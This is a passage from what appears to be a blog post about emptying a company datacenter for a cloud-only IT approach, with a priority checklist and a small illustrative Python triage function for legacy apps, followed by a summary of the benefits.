This is where the “never gonna happen” mantra starts. Therefore, you must keep your clear vision of a cloud-only IT AND be as pragmatic as necessary. Start a project that goes through all your applications and checks them against a priority list like this one:

  • Do we still need this? (I have seen companies that saved a lot of money by asking this simple question)
  • Is there a SaaS service available for this application?
  • Can we move it to Azure (IaaS)?
  • Can we easily ‘publish’ it via Web Application Proxy (assuming it speaks HTTP)?
  • Do we have to provide a per-app VPN for it?

Going through all the apps in the basement with this list is what we sometimes call “app feng shui”.

This list is ordered by priority from top to bottom and is not complete, but you can imagine what to do here. The benchmark is user experience: in a 100% cloud approach, you should provide the best possible user experience, regardless of the location of the device connecting to your services and regardless of where the servers it runs on reside.
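For illustration only, the triage can be sketched as a tiny function that walks the priority list from top to bottom and returns the first option that applies (the app attributes are made up for this example):

```python
# A sketch of the "app feng shui" triage: walk the priority list from
# top to bottom and return the first disposition that applies.
def triage(app):
    if not app.get("still_needed", True):
        return "retire"                            # saves money immediately
    if app.get("saas_available"):
        return "move to SaaS"
    if app.get("azure_compatible"):
        return "lift to Azure IaaS"
    if app.get("speaks_http"):
        return "publish via Web Application Proxy"
    return "per-app VPN"                           # last resort

# Hypothetical inventory of the "boxes in the basement".
apps = {
    "legacy-report":         {"still_needed": False},
    "crm":                   {"saas_available": True},
    "erp":                   {"azure_compatible": True},
    "intranet-tool":         {"speaks_http": True},
    "old-client-server-app": {},
}

for name, attrs in apps.items():
    print(f"{name}: {triage(attrs)}")
```

The point of ordering the checks this way is that the cheapest, most cloud-native option wins first, and the per-app VPN remains the fallback for everything else.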

You may have recognized that the ‘last boxes in the basement’ struggle against the 100% cloud approach. But this should not discourage you, and it certainly should not lead you to the conclusion not to start at all!

In fact, this is the point! You must do what you can here to get as close to 100% as possible. In addition to “app feng shui”, you should also plan how to proceed with those apps in one year and beyond. Maybe new possibilities will open up by then, for example because a SaaS version is already under development.

Summary

So, that’s it. Your datacenter is (nearly) empty now. As mentioned before, we will dig deeper into many areas mentioned in this blog post in upcoming posts.

I would like to end this post with a list of things you can achieve for yourself and your company by going 100% cloud:

  • Mobility: work from any device and any location
  • Evergreen: always up-to-date, for security and for the latest tools and features
  • Collaboration: enable your users to collaborate easily with whom they want without having to use Shadow IT tools
  • Self-services: freedom and agility to the user
  • State of the art security: prepared for modern threats by leveraging cloud intelligence
  • Knowledge sharing: users will be able to share knowledge with community tools.

Is all this easy to achieve? No. Does your company need to change in every cell of its ‘body’? Yes, but I believe it is worth it.

I am really looking forward to providing articles here that help you empty your datacenters and take full advantage of the 100% cloud approach.